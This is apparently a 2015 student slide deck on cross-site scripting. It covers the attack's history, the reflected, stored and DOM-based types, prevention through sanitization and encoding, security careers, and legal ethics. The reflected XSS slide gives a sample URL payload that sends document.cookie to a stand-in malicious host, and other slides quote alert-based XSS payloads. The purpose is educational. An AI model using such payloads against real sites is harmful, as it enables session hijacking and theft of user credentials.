Cross-Site Scripting (XSS)

Joni Hall and Daniel Tumser

Overview

Table of Contents● Introduction● Related Works● Technical Aspects● Types of XSS

o Reflected XSSo Stored XSSo DOM-Based XSSo Prevention

● Careers and Jobs● Social Impact● Ethical Impact● Future Expectations● Conclusion● References

Introduction● Cross-Site Scripting (XSS) occurs when an attacker

uses a web application to gather data from a user

● Attackers inject JavaScript into an application to fool a user to get data from them

● Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.

Related Works● 1995 - Netscape releases JavaScript● 1999 - David Ross (Microsoft) publishes “Script

Injection” paper● 2000 - Microsoft works with CERT● 2005 - Samy Kamkar attacks MySpace● 2006 - Cross-Site Scripting Malware popular

o port scanners, keyloggers, etc● 2007 - XSS #1 on the Open Web Application Security

Project (OWASP) Top Ten list● 2010 - XSS #2 on OWASP Top Ten list● 2013 - XSS #3 on OWASP Top Ten list

Technical Aspects● Leverages JavaScript to attack the user

o JS is a client-side processed scripting language

● General aim of the attack is Session Hijacking or Credentials Stealingo ex. Steal user cookie & use web app

as them● Can compromise the entire application

through users

Reflected XSS● Most common form of XSS vulnerability (roughly 75% of cases)● Vulnerability

o Improper filtering/sanitization of HTTP parameters or user input that are processed by server-side scripts and reflected in the HTML the client receives

● Exploito Crafted input by malicious user is added to a URL and sent to target

usero http://www.something.com/thing.cgi?param=<script>document.location=“http://

www.maliciousSite.com/?”+document.cookie;</script>

● Problemo Relies on target user having active session to hijack

Stored XSS● Attack stored in application servers● Vulnerability

o Improper user input sanitization in forms and user-created content instead of HTTP request params

● Exploito Malicious script is injected into the page content viewed by other users

ex. MySpace content (by Samy), Ebay sale listing (by Shubham Upadhyay) '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")</script>

● Why it’s more dangerouso Other users will already have an active session with the application in order for malicious

code to be processed on their browser

XSS Illustrated

DOM-Based XSS● All client-side processing, no server processing● Vulnerability

o Improper JS data handling.● Exploit

o Leverages Document Object Model, pulling data with AJAX, and client-side processing

● Exampleo Next slide from Open Web Application Security Project (OWASP)

DOM-Based XSS Example● Expected URL in HTTP request, parameter decides default language to

displayo http://www.some.site/page.html?default=French

● Malicious URLo http://www.some.site/page.html?default=<script>alert(document.cookie)</script>

● Script in HTTP response from servero document.write("<OPTION value=1>"+document.location.href.substring

(document.location.href.indexOf("default=")+8)+"</OPTION>");

o All processing references made to the Location object in the Document object for the web page in the browser (document.location)

o Specifically to the value sent as the “default=” parameter

DOM-Based XSS Example Cont.● Browser processes the script received by the server which● injects the malicious URL parameter script into the DOM when rendering

the page, which● executes the malicious script

Preventing XSS● Recursive sanitization

o When processing a client HTTP request or user supplied data it must be sanitizedo Why recursive?

Wrapping commonly sanitized characters or sub-strings ex. <scr<script>ipt> . . . </scr</script>ipt> becomes… <script> . . . </script>

● Properly handle Encoding/Decodingo URL Encoding / Percent Encoding

One method attackers used to bypass literal character filtering is to encode known untrusted/dangerous characters (ex. %3C = ‘<’)

o HTML Encoding / Decoding Another method for bypassing these filters is to HTML encode those characters

injected into the document to be decoded back into scripts when the page is rendered

Careers and Jobs

Job Growth Projection (2012-2022)● Jobs in 2012 /

2022o 141,400 /

169,900● 10-year Growth

o +20% /+28,500

Web Developer Pay (2012)● Median wage (Web Devs.)

o $62,500● vs Median wage (all

occupations)o x1.8

Web Developer

Careers and Jobs

Skills● HTML● JavaScript● PHP● C#● jQuery● CSS

Web Developer

● Java● SQL● Ruby on Rails● .NET● ASP.NET● MySQL

Careers and Jobs

Skills● Web Security and

Encryption● Network Security

management

Penetration Tester

● Security Testing and Auditing

● Computer Security

Careers and Jobs

Minimum Qualifications● Bachelor's degree and 3 years of

professional work experience (or a master's degree)

Additional Qualifications● Experience in

o developing web applications in Java, Ruby or JavaScript

o OWASP or NIST 800-64o application security assessment toolso IT Security user groups or security

certification (CISSP, CEH, OSCP, etc.)(MathWorks job listing)

Web Application Security Engineer

Careers and Jobs

Firefox Platform EngineerMinimum Qualifications

● Experienceo writing code. College degree is not

necessary or sufficient.o Expertise in any of C++, JavaScript, or

Python.o Experience debugging or profiling.

Desired Skills● C++; JavaScript; x86, x86_64, or ARM● Experience with cryptographic signing and

verification.● Experience with security threat models.● and more

Platform/Browser Engineer & Security Engineer

Platform Security EngineerMinimum Qualifications

● BS in Computer Science (or equivalent) plus 3-5 years industry experience

● Strong knowledge of C++ and JavaScript● Strong privacy or security background● Experience working in security or development

team● Experience in contributing to large open source

projects is a plus● Excellent verbal and written communication skills

Social Impact

● Link mistrust?o Users still lax and ignoranto Hackers/hacking still a very

opaque subject to most● Train users?

o Organizations already doo They get the training wrongo Users are still making dumb

mistakes (ex. Only hover over a

link to check if the domain matches)

Ethical Impact

Don’t do it(without permission)

It’s unethical and very illegal. Unless you like fines, 5-20 years in prison (Title 18 U.S. Code § 1030(C)) and civil litigation.

Offensive/Malicious Perspective

Ethical Impact

● Developers have an ethical and sometimes legal responsibility to their clients.o XSS can result in the compromise of the entire application in addition

to client accountso Client compromise can disclose PII, and App compromise can mean

total data breach and network compromise● Data breach disclosure is required by law in every state but New Mexico,

Alabama and South Dakotao Very damaging for a company financially and to client trust

relationships

Defensive/Developer Perspective

Secure your code!

Future Expectations

● One estimate is that 94% of web applications are vulnerable to XSSo Every month roughly 10-25 XSS holes are found in

commercial products● Jobs

o the bureau of labor statistics expects a 37% increase for InfoSec professionals 2012-2022

● Prevention by consumer education is key!

Conclusion

● Almost all web applications are vulnerable to XSS● XSS has been on OWASP’s Top Ten list for 8 years● Repercussions to XSS?

o possible to probable jail-time and fines● Preventing XSS?

o biggest burden lies in consumer/user education● Jobs?

o expecting increase of 37% (2012-2022) all computer systems need security

References1. Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook Finding and Exploiting Security Flaws. 2nd ed. Indianapolis: Wiley,

2011. Print.2. "The Cross-Site Scripting (XSS) FAQ." 'Web and Application Security News' Web. 17 June 2015. http://www.cgisecurity.com/xss-faq.html. 3. "XSS (Cross Site Scripting) Prevention Cheat Sheet." - OWASP. Web. 17 June 2015.

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. 4. "A Short History of JavaScript." - Web Education Community Group. Web. 17 June 2015.

https://www.w3.org/community/webed/wiki/A_Short_History_of_JavaScript.5. "History of Cross Site Scripting." Increased Visibility. Web. 17 June 2015. http://intellavis.com/blog/?p=284.6. "Types of Cross-Site Scripting." - OWASP. Web. 17 June 2015. https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting.7. "Securing Your Web Browser." Securing Your Web Browser. CERT. Web. 17 June 2015. https://www.us-cert.gov/publications/securing-your-web-

browser.8. Saxena, Prateek. "Systematic Techniques for Finding and Preventing Script Injection Vulnerabilities." Electrical Engineering and Computer Sciences

University of California at Berkeley, 29 June 2012. Web. 17 June 2015. http://www.eecs.berkeley.edu/Pubs/TechRpts/2012/EECS-2012-170.pdf.9. Klein, Amit. "Cross Site Scripting Explained." Sanctum Security Group, 1 June 2002. Web. 17 June 2015.

https://crypto.stanford.edu/cs155/papers/CSS.pdf.10. "Web Application Security Engineer." - MathWorks Jobs. MathWorks. Web. 17 June 2015.

http://www.mathworks.com/company/jobs/opportunities/web-application-security-engineer-14497?source=10192.11. "Web Application Security Engineer Salary." Web Application Security Engineer Salary. Indeed. Web. 17 June 2015. http://www.indeed.com/salary?

q1=Web Application Security Engineer&l1=.12. "Web Application Developer Salary (United States)." Web Application Developer Salary (United States). PayScale. Web. 17 June 2015.

http://www.payscale.com/research/US/Job=Web_Application_Developer/Salary.13. "Web Developers." U.S. Bureau of Labor Statistics. U.S. Bureau of Labor Statistics, 8 Jan. 2014. Web. 17 June

2015.http://www.bls.gov/ooh/computer-and-information-technology/web-developers.htm.14. "Penetration Tester Salary (United States)." Penetration Tester Salary (United States). PayScale. Web. 17 June 2015.

http://www.payscale.com/research/US/Job=Penetration_Tester/Salary.15. "18 U.S. Code § 1030 - Fraud and Related Activity in Connection with Computers." 18 U.S. Code § 1030. Cornell University. Web. 17 June 2015.

<https://www.law.cornell.edu/uscode/text/18/1030>.

Cross-Site Scripting (XSS)

Joni Hall and Daniel Tumser